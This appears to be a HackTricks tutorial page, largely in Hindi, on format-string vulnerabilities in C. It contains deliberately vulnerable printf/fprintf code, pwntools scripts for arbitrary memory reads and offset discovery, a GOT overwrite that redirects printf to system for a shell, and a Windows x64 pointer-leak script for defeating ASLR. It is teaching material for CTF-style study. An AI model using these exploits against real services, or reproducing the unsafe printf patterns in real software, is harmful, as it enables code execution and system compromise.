Format Strings

Reading time: 12 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

सदस्यता योजनाओं की जांच करें!
हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।

बुनियादी जानकारी

C में printf एक फ़ंक्शन है जिसका उपयोग किसी string को प्रिंट करने के लिए किया जाता है। इस फ़ंक्शन से अपेक्षित पहला पैरामीटर वह कच्चा टेक्स्ट है जिसमें formatters मौजूद होते हैं। अपेक्षित अगले पैरामीटर वे मान होते हैं जिन्हें कच्चे टेक्स्ट के formatters में प्रतिस्थापित किया जाता है।

अन्य कमजोर फ़ंक्शन हैं sprintf() और fprintf()।

यह कमजोरि तब प्रकट होती है जब इस फ़ंक्शन को पहला आर्ग्युमेंट के रूप में हमलावर का टेक्स्ट दिया जाता है। हमलावर printf format स्ट्रिंग क्षमताओं का दुरुपयोग करते हुए एक विशेष इनपुट तैयार कर सकेगा जिससे वह किसी भी एड्रेस से डेटा पढ़ने और किसी भी एड्रेस पर डेटा लिखने में सक्षम होगा (readable/writable)। इस तरह वह arbitrary code को execute करने में सक्षम हो सकता है।

Formatters:

bash

%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3

उदाहरण:

कमजोर उदाहरण:

char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.

सामान्य उपयोग:

int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5

तर्कों की कमी के साथ:

printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

fprintf असुरक्षित:

#include <stdio.h>

int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input can include formatters!
fclose(output_file);
return 0;
}

पॉइंटर्स तक पहुँच

फॉर्मैट %<n>$x, जहाँ n एक संख्या है, printf को यह संकेत देता है कि वह stack से n वाँ parameter चुने। तो यदि आप printf का उपयोग करके stack से 4th param पढ़ना चाहते हैं तो आप कर सकते हैं:

printf("%x %x %x %x")

और आप पहले से चौथे param तक पढ़ेंगे।

या आप यह कर सकते हैं:

printf("%4$x")

और सीधे चौथे को पढ़ें।

Notice that the attacker controls the printf parameter, which basically means that his input is going to be in the stack when printf is called, which means that he could write specific memory addresses in the stack.

caution

यदि कोई attacker इस इनपुट को नियंत्रित करता है, तो वह stack में arbitrary address जोड़ सकेगा और printf को उन्हें access करवा सकेगा। अगले सेक्शन में इस व्यवहार का उपयोग कैसे किया जाए बताया जाएगा।

Arbitrary Read

It's possible to use the formatter %n$s to make printf get the address situated in the n position, following it and print it as if it was a string (print until a 0x00 is found). So if the base address of the binary is 0x8048000, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:

python

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

caution

ध्यान दें कि आप address 0x8048000 को इनपुट की शुरुआत में नहीं रख सकते क्योंकि उस address के अंत में स्ट्रिंग 0x00 पर cat हो जाएगी.

ऑफ़सेट ढूँढें

अपने इनपुट तक का ऑफ़सेट जानने के लिए आप 4 या 8 बाइट भेज सकते हैं (0x41414141) इसके बाद %1$x लगाएँ और बढ़ाएँ मान तब तक जब तक A's प्राप्त न हों।

Brute Force printf offset

python

# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over a range of integers
for i in range(10):
# Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()

# Start a new process of the "chall" binary
p = process("./chall")

# Send the payload to the process
p.sendline(payload)

# Read and store the output of the process
output = p.clean()

# Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
# If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}")
break

# Close the process
p.close()

कितनी उपयोगी

Arbitrary reads निम्नलिखित के लिए उपयोगी हो सकते हैं:

Dump the binary from memory
Access specific parts of memory where sensitive info is stored (like canaries, encryption keys or custom passwords like in this CTF challenge)

Arbitrary Write

The formatter %<num>$n लिखता है stack के param में संकेतित उस address में लिखे गए bytes की संख्या। अगर कोई attacker printf के साथ जितने भी char चाहे लिख सकता है, तो वह %<num>$n को किसी भी arbitrary number को किसी भी arbitrary address में लिखने के लिये इस्तेमाल कर सकेगा।

सौभाग्य से, संख्या 9999 लिखने के लिए इनपुट में 9999 "A"s जोड़ने की आवश्यकता नहीं है; इसके बजाय formatter %.<num-write>%<num>$n का उपयोग करके आप संख्या <num-write> को उस address pointed by the num position` में लिख सकते हैं।

bash

AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

हालाँकि, ध्यान दें कि आम तौर पर किसी पते को जैसे 0x08049724 (जो एक बार में लिखने के लिए बहुत बड़ा नंबर है) लिखने के लिए $hn का उपयोग किया जाता है बजाय $n के। यह केवल 2 Bytes ही लिखने की अनुमति देता है। इसलिए यह ऑपरेशन दो बार किया जाता है, एक बार पते के उच्चतम 2B के लिए और दूसरी बार निम्नतम के लिए।

इसलिए, यह vulnerability किसी भी पते पर कुछ भी लिखने की अनुमति देती है (arbitrary write).

In this example, the goal is going to be to overwrite the address of a function in the GOT table that is going to be called later. Although this could abuse other arbitrary write to exec techniques:

Write What Where 2 Exec

हम एक ऐसी function को overwrite करने जा रहे हैं जो अपने arguments user से receives करती है और उसे system function की ओर point कर देंगे।
जैसा कि बताया गया है, address लिखने के लिए आम तौर पर 2 कदम आवश्यक होते हैं: आप पहले address के 2Bytes लिखते हैं और फिर बाकी के 2। इसके लिए $hn का उपयोग किया जाता है।

HOB को address के उच्च 2 Bytes कहा जाता है
LOB को address के निम्न 2 Bytes कहा जाता है

फिर, format string के काम करने के तरीके के कारण आपको [HOB, LOB] में से सबसे छोटा पहले लिखना होगा और फिर दूसरे को।

यदि HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

यदि HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

bash

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Pwntools टेम्पलेट

आप इस प्रकार की vulnerability के लिए exploit तैयार करने का एक टेम्पलेट यहाँ पा सकते हैं:

Format Strings Template

या यह बुनियादी उदाहरण here:

python

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Format Strings to BOF

यह संभव है कि किसी format string vulnerability की write actions का दुरुपयोग करके write in addresses of the stack किया जाए और एक buffer overflow प्रकार की vulnerability का exploit किया जाए।

Windows x64: Format-string leak to bypass ASLR (no varargs)

Windows x64 पर पहले चार integer/pointer पैरामीटर registers में पास किए जाते हैं: RCX, RDX, R8, R9। कई buggy call-sites में attacker-controlled string को format argument के रूप में उपयोग किया जाता है लेकिन कोई variadic arguments प्रदान नहीं किए जाते, उदाहरण के लिए:

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

चूँकि कोई varargs पास नहीं किए जाते हैं, कोई भी conversion जैसे "%p", "%x", "%s" CRT को उपयुक्त register से अगला variadic argument पढ़ने के लिए मजबूर करेगा। Microsoft x64 calling convention में "%p" के लिए ऐसा पहला read R9 से आता है। कॉल-साइट पर R9 में जो भी अस्थायी मान होगा वह प्रिंट होगा। व्यवहार में यह अक्सर एक स्थिर in-module pointer को leak कर देता है (उदाहरण के लिए, एक pointer to a local/global object जो पहले surrounding code द्वारा R9 में रखा गया था या एक callee-saved value), जिसे module base को recover करने और ASLR को मात देने के लिए उपयोग किया जा सकता है।

Practical workflow:

सबसे शुरुआत में attacker-controlled string में "%p " जैसा harmless format inject करें ताकि पहला conversion किसी भी filtering से पहले execute हो जाए।
leaked pointer को capture करें, उस object का static offset module के अंदर पहचानें (symbols के साथ या एक local copy का उपयोग करके एक बार reversing करके), और image base को leak - known_offset के रूप में recover करें।
उस base को reuse करके ROP gadgets और IAT entries के absolute addresses remotely compute करें।

Example (abbreviated python):

python

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))

Notes:

The exact offset to subtract is found once during local reversing and then reused (same binary/version).
If "%p" doesn’t print a valid pointer on the first try, try other specifiers ("%llx", "%s") or multiple conversions ("%p %p %p") to sample other argument registers/stack.
This pattern is specific to the Windows x64 calling convention and printf-family implementations that fetch nonexistent varargs from registers when the format string requests them.

This technique is extremely useful to bootstrap ROP on Windows services compiled with ASLR and no obvious memory disclosure primitives.

अन्य उदाहरण और संदर्भ

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit, relro, no canary, nx, no pie, format string to overwrite the address fflush with the win function (ret2win)
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
32 bit, relro, no canary, nx, no pie, format string to write an address inside main in .fini_array (so the flow loops back 1 more time) and write the address to system in the GOT table pointing to strlen. When the flow goes back to main, strlen is executed with user input and pointing to system, it will execute the passed commands.

References

tip

HackTricks का समर्थन करें

सदस्यता योजनाओं की जांच करें!
हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।